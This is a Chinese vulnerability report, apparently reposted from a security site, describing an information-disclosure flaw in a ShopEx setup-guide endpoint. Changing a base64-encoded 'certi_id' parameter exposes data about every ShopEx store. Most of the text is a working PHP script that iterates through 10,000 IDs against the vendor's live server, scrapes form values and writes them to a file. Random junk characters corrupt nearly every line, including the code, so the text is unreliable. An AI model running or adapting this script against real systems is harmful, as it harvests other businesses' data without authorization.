|
简要描述:
- x2 m) p0 o" M. b6 E: ?; TShopEx某接口缺陷,可遍历所有网站& }3 m! O2 s& B* K- A* J
详细说明:' @# I7 J2 z: [( j
问题出现在shopex 网店使用向导页面 / e: W0 ^7 F \4 ]5 g
( [$ Z- X' U6 v" G: a( T4 u
a1 |7 f4 r3 I+ `3 ?, }& u( ?% A1 r' G1 G. T4 q, c7 m3 @
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=" B" k) O: Y3 O" N+ H9 l8 i) Y4 f# Q
7 p- P- f' b: ~! ], b) g9 i2 }8 s }( h/ \8 }
' k, v1 T; g A8 z+ j1 K
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}* U* h$ a1 l+ W" H Y! _0 _
+ Z- e2 d+ U' o8 i1 e6 t, @4 S3 Q( l# U
/ }* Z* K" u6 g& U我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
- g4 _; g3 q' F; I
: k8 ?) |% D- p% j) y- V
4 g3 |6 @4 G; w7 T! d8 U( c: B4 |' H, B
<?php
2 t* t2 P1 w) Y/ {
. J. I) r7 d5 X7 o" b for ($i=1; $i < 10000; $i++) { //遍历- ^% w! k) o8 M! K6 a4 y4 T
2 P# `! B& l# _9 x/ L; r6 s: V* w ShowshopExD($i);; A1 u! f( t6 u* m$ ^
! [3 ]3 Y ~/ e+ w
}
) t U2 t8 S4 V3 a# H( E/ k" l7 F7 W' ^: X6 ~$ Q/ t+ Z, d4 K& C
function ShowshopExD($cid) {- g9 q6 e2 n$ F' D p. s8 M
2 m" y* Y: i! } K0 K1 @ $url='http://guide.ecos.shopex.cn/step2.php';
/ _; [. E4 Z7 t4 s* z$ n" f8 }; E: C2 T$ V3 {- k4 J
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
$ b/ C8 Z, P+ e7 P$ W- X- e8 b1 J4 v. j% O
$url = $url.'?refer='.$refer;3 X: q8 Z! S* f. f. L
' y( q& v+ h$ S- \: @0 Z! ^$ d $ch = curl_init($url);
1 A! [$ q! R, b5 H7 h1 W8 L1 G% N
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;# i1 v) k* ]4 P* ? Y
+ x- x! O. e# ^# j) ]
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
. G& T) b6 }3 }
( i* f1 O" H% L1 G* u- J* `5 @ $result = curl_exec($ch);
- K5 |- g: @, `4 I9 O& d' h, X* i: I% J( Y; y, q5 {
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
1 X. c; a' }7 d, d
4 V& e" f9 C# @1 w; L if(strpos($result,$refer))3 b# N0 _ z a
+ B' i+ N+ x! i5 i1 \+ M, { {( G* v2 _. v% [3 s. f
( Y3 [, A4 y X$ R/ J6 O $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
. S$ E* X' k w- f5 P- [1 J1 _1 m
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
# A$ O1 l4 e* f1 i) [+ {
( }+ M# S( l5 S! K2 x3 Y foreach ($value[1] as $key) {6 g; t: M% F' [2 {
5 ~2 C( o: l# `3 V6 f' f preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);0 d x+ ]) k+ i' O8 m6 z
; T5 m# N& N8 v. A; T echo $res[1][0].':'.$res[3][0]."\r\n";
3 M' X8 I/ B, B* b" \. y1 ^
& D9 I; Y' J1 f6 z1 N; ] $col =$res[1][0].':'.$res[3][0]."\r\n";
: i6 F7 P+ @- M
* s5 w3 ~1 _+ {7 O7 X fwrite($fp, $col, strlen($col));
6 d( V6 f Z7 H1 Z/ ?1 e( ?4 u; \% e. D
}
/ G8 H& h# R$ n! B) U4 y% K. r9 N' \ {/ z/ b$ C3 ]; q" W* S
echo '--------------------------------'."\r\n";* k6 I$ Y# s$ ]* ^' N
2 T6 i, @: J3 h0 F+ ~& t
fclose($fp);
. o# v: v6 a8 k' x8 f! X- Z; ~5 m& f
}7 Q+ }: W! _: P. ~' v) K
6 Q- q: n" k' r( A, z. K
flush();3 f" t% D6 _! J& v! B' {! I
( y" y* z8 d0 p+ {" M
curl_close($ch);! R6 L# H* j- t% s
+ x, ^5 J* H! F/ f
}
6 ^+ Q3 W3 T8 T6 z$ q5 V6 @
5 D* I; e# f% w0 Q. Q2 I?>
; f1 P$ B- s- x0 F' |# A' O漏洞证明:% G! K# P1 r& ^; P2 i
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
, `- L7 j" l% ~1 s( {1 |) n0 Yrefer换成其他加密方式" c% |5 x/ {! ?4 |, y
|
|